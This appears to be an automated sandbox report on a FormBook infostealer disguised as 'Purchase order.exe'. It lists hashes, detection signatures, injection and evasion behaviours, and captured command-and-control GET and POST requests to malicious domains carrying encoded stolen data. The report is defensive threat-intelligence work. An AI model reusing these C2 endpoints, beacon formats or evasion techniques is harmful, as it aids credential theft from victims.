Windows Analysis Report
Purchase order.exe

Overview

General Information

Sample name: Purchase order.exe
Analysis ID: 1651062
MD5: f2e182347d386d3df01b4e0c00eb8ac9
SHA1: eeadaddb9efa8c42ee11d74d6e8fc2e90be2a796
SHA256: 5afa82f99cbc39a07652a0ca4e3e8b617381f8d01c07313013ac3cd48076dc4f
Tags: exeuser-TeamDreier
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://www.mslgdkor.xyz/v65o/?PJHp9d=VqSAL9WTV7zchNt/0oSiL6Nu4I33Tdmkfhtz7fksE6sNrHQ8gHPIdfTZPfapnvCf2ySdC7NSRvCAaHzRgotZC8MEAkSWPQHwkIzkhdJVEMoG87S7evgDDAoJKAHwSzvonkDGBYo=&9v0d3=Mp0DRHEP Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Purchase order.exe Virustotal: Detection: 42% Perma Link
Source: Purchase order.exe ReversingLabs: Detection: 72%
Yara detected FormBook
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2615984207.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2617306934.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1905455686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2615715493.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1981834340.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2616880626.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1911046997.0000000003980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2617251944.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Neural Call Log Analysis: 99.3%
Uses 32bit PE files
Source: Purchase order.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Purchase order.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: forfiles.pdb source: InstallUtil.exe, 00000002.00000002.1906166179.0000000001228000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000002.2616590138.000000000162E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: forfiles.pdbGCTL source: InstallUtil.exe, 00000002.00000002.1906166179.0000000001228000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000004.00000002.2616590138.000000000162E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Purchase order.exe, 00000000.00000002.1391092460.0000000004481000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1391092460.00000000045B7000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1395912851.00000000067D8000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: InstallUtil.exe, 00000002.00000002.1906353643.0000000001760000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1915419405.00000000043DD000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.000000000472E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1906511372.0000000004223000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.0000000004590000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Purchase order.exe, 00000000.00000002.1391092460.0000000004481000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1391092460.00000000045B7000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1395912851.00000000067D8000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 00000002.00000002.1906353643.0000000001760000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, forfiles.exe, 00000005.00000003.1915419405.00000000043DD000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.000000000472E000.00000040.00001000.00020000.00000000.sdmp, forfiles.exe, 00000005.00000003.1906511372.0000000004223000.00000004.00000020.00020000.00000000.sdmp, forfiles.exe, 00000005.00000002.2617586828.0000000004590000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: forfiles.exe, 00000005.00000002.2618298895.0000000004BBC000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.0000000000985000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2618028068.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2212834626.000000000271C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: InstallUtil.pdb source: forfiles.exe, 00000005.00000002.2618298895.0000000004BBC000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 00000005.00000002.2616112369.0000000000985000.00000004.00000020.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2618028068.0000000002ACC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2212834626.000000000271C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iveUJ72crs3yyPj.exe, 00000004.00000000.1827388972.000000000089F000.00000002.00000001.01000000.00000007.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2616482669.000000000089F000.00000002.00000001.01000000.00000007.sdmp
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0061C3D0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_01AC1328
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0642F7F0h 0_2_0642F731
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0642F7F0h 0_2_0642F738
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0660B044h 0_2_0660AE40
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0660B044h 0_2_0660AE30
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0660D755h 0_2_0660D4B9
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0660D755h 0_2_0660D3E0
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 4x nop then jmp 0660D755h 0_2_0660D3D2
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 4x nop then xor eax, eax 5_2_00609DE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 4x nop then pop edi 5_2_0060DFF7
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 4x nop then mov ebx, 00000004h 5_2_044204D8

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49693 -> 172.67.205.132:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49697 -> 199.59.243.228:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.mslgdkor.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 199.59.243.228 199.59.243.228
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /v65o/?PJHp9d=VqSAL9WTV7zchNt/0oSiL6Nu4I33Tdmkfhtz7fksE6sNrHQ8gHPIdfTZPfapnvCf2ySdC7NSRvCAaHzRgotZC8MEAkSWPQHwkIzkhdJVEMoG87S7evgDDAoJKAHwSzvonkDGBYo=&9v0d3=Mp0DRHEP HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.mslgdkor.xyzConnection: closeUser-Agent: SAMSUNG-GT-E3309I Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.33943/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: global traffic HTTP traffic detected: GET /7y0v/?PJHp9d=7N/zF1rOcEGbLYizaO5JxpdIWLfrGZ9Jg8PdVBNBbVgzV8I2rHx2tyYdS7i8u6804dB3yr+SB/ZwHiEC2lihPucSouo2vrK8VD78yx4XJLhmdpMvh34FtQ6gjCzg/7+vl1vgQc4=&9v0d3=Mp0DRHEP HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.v153cbo9xcl49.buzzConnection: closeUser-Agent: SAMSUNG-GT-E3309I Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.33943/37.6334; U; en) Presto/2.12.423 Version/12.16
Source: global traffic DNS traffic detected: DNS query: www.mslgdkor.xyz
Source: global traffic DNS traffic detected: DNS query: www.v153cbo9xcl49.buzz
Source: global traffic DNS traffic detected: DNS query: www.bolaemas88.online
Source: unknown HTTP traffic detected: POST /7y0v/ HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.v153cbo9xcl49.buzzContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 211Cache-Control: max-age=0Origin: http://www.v153cbo9xcl49.buzzReferer: http://www.v153cbo9xcl49.buzz/7y0v/User-Agent: SAMSUNG-GT-E3309I Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.33943/37.6334; U; en) Presto/2.12.423 Version/12.16Data Raw: 50 4a 48 70 39 64 3d 32 50 58 54 47 42 50 46 64 31 7a 2b 4a 4a 47 35 43 5a 52 68 78 38 52 4a 52 37 4b 54 48 61 39 56 71 65 6a 59 48 43 34 4d 66 6a 42 54 4c 75 64 43 38 69 56 2b 71 44 4a 35 5a 50 75 79 76 4b 59 2f 6c 4d 59 76 6c 75 65 41 4f 50 49 6c 4f 30 64 62 38 55 2b 37 4c 39 55 44 70 2f 73 35 77 75 2f 34 61 54 62 79 31 77 45 54 4e 6f 6f 30 44 73 52 6d 77 42 30 36 32 7a 7a 59 7a 31 58 37 34 38 76 70 37 46 33 41 56 4a 41 6d 30 51 77 54 4f 5a 53 4e 56 4a 39 44 67 4e 75 65 50 53 37 4f 5a 57 49 64 4a 73 32 6f 48 6c 39 54 39 45 72 38 39 52 6c 75 51 34 4a 72 7a 6d 4a 65 2b 45 39 46 65 4a 78 63 6d 5a 54 33 69 68 39 4f 4a 6f 4a 32 Data Ascii: PJHp9d=2PXTGBPFd1z+JJG5CZRhx8RJR7KTHa9VqejYHC4MfjBTLudC8iV+qDJ5ZPuyvKY/lMYvlueAOPIlO0db8U+7L9UDp/s5wu/4aTby1wETNoo0DsRmwB062zzYz1X748vp7F3AVJAm0QwTOZSNVJ9DgNuePS7OZWIdJs2oHl9T9Er89RluQ4JrzmJe+E9FeJxcmZT3ih9OJoJ2
Source: Purchase order.exe String found in binary or memory: http://blog.stevenlevithan.com/archives/cross-browser-split
Source: Purchase order.exe String found in binary or memory: http://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference
Source: Purchase order.exe String found in binary or memory: http://nuget.org/packages/ES5
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: iveUJ72crs3yyPj.exe, 00000008.00000002.2616880626.0000000000B57000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.v153cbo9xcl49.buzz
Source: iveUJ72crs3yyPj.exe, 00000008.00000002.2616880626.0000000000B57000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.v153cbo9xcl49.buzz/7y0v/
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org?q=
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1391092460.00000000044D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: forfiles.exe, 00000005.00000003.2101082602.0000000007683000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: forfiles.exe, 00000005.00000002.2616112369.00000000009A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Purchase order.exe, 00000000.00000002.1375904708.0000000003481000.00000004.00000800.00020000.00000000.sdmp, Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Purchase order.exe, 00000000.00000002.1394905071.00000000065A0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: forfiles.exe, 00000005.00000002.2618298895.0000000005136000.00000004.10000000.00040000.00000000.sdmp, forfiles.exe, 00000005.00000002.2619973452.0000000007400000.00000004.00000800.00020000.00000000.sdmp, iveUJ72crs3yyPj.exe, 00000008.00000002.2618028068.0000000003046000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: forfiles.exe, 00000005.00000002.2620126209.00000000076AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2615984207.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2617306934.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1905455686.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2615715493.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1981834340.00000000063C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2616880626.0000000000AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1911046997.0000000003980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2617251944.0000000005000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase order.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_06651480 NtProtectVirtualMemory, 0_2_06651480
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_066547E8 NtResumeThread, 0_2_066547E8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_066548D8 NtResumeThread, 0_2_066548D8
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_066548DB NtResumeThread, 0_2_066548DB
Source: C:\Users\user\Desktop\Purchase order.exe Code function: 0_2_066547E0 NtResumeThread, 0_2_066547E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_0042C5D3 NtClose, 2_2_0042C5D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2B60 NtClose,LdrInitializeThunk, 2_2_017D2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2DF0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_017D2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2C70 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_017D2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D35C0 NtCreateMutant,LdrInitializeThunk, 2_2_017D35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D4340 NtSetContextThread, 2_2_017D4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D4650 NtSuspendThread, 2_2_017D4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2BF0 NtAllocateVirtualMemory, 2_2_017D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2BE0 NtQueryValueKey, 2_2_017D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2BA0 NtEnumerateValueKey, 2_2_017D2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2B80 NtQueryInformationFile, 2_2_017D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2AF0 NtWriteFile, 2_2_017D2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2AD0 NtReadFile, 2_2_017D2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2AB0 NtWaitForSingleObject, 2_2_017D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2D30 NtUnmapViewOfSection, 2_2_017D2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2D10 NtMapViewOfSection, 2_2_017D2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2D00 NtSetInformationFile, 2_2_017D2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2DD0 NtDelayExecution, 2_2_017D2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2DB0 NtEnumerateKey, 2_2_017D2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2C60 NtCreateKey, 2_2_017D2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2C00 NtQueryInformationProcess, 2_2_017D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2CF0 NtOpenProcess, 2_2_017D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2CC0 NtQueryVirtualMemory, 2_2_017D2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2CA0 NtQueryInformationToken, 2_2_017D2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2F60 NtCreateProcessEx, 2_2_017D2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2F30 NtCreateSection, 2_2_017D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2FE0 NtCreateFile, 2_2_017D2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2FB0 NtResumeThread, 2_2_017D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2FA0 NtQuerySection, 2_2_017D2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2F90 NtProtectVirtualMemory, 2_2_017D2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2E30 NtWriteVirtualMemory, 2_2_017D2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2EE0 NtQueueApcThread, 2_2_017D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2EA0 NtAdjustPrivilegesToken, 2_2_017D2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D2E80 NtReadVirtualMemory, 2_2_017D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D3010 NtOpenDirectoryObject, 2_2_017D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D3090 NtSetValueKey, 2_2_017D3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D39B0 NtGetContextThread, 2_2_017D39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D3D70 NtOpenThread, 2_2_017D3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_017D3D10 NtOpenProcessToken, 2_2_017D3D10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04604650 NtSuspendThread,LdrInitializeThunk, 5_2_04604650
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04604340 NtSetContextThread,LdrInitializeThunk, 5_2_04604340
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602C60 NtCreateKey,LdrInitializeThunk, 5_2_04602C60
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_04602C70
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602CA0 NtQueryInformationToken,LdrInitializeThunk, 5_2_04602CA0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602D30 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_04602D30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602D10 NtMapViewOfSection,LdrInitializeThunk, 5_2_04602D10
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_04602DF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602DD0 NtDelayExecution,LdrInitializeThunk, 5_2_04602DD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602EE0 NtQueueApcThread,LdrInitializeThunk, 5_2_04602EE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602E80 NtReadVirtualMemory,LdrInitializeThunk, 5_2_04602E80
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602F30 NtCreateSection,LdrInitializeThunk, 5_2_04602F30
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602FE0 NtCreateFile,LdrInitializeThunk, 5_2_04602FE0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602FB0 NtResumeThread,LdrInitializeThunk, 5_2_04602FB0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602AF0 NtWriteFile,LdrInitializeThunk, 5_2_04602AF0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602AD0 NtReadFile,LdrInitializeThunk, 5_2_04602AD0
Source: C:\Windows\SysWOW64\forfiles.exe Code function: 5_2_04602B60 NtClose,LdrInitializeThunk, 5_2_04602B60
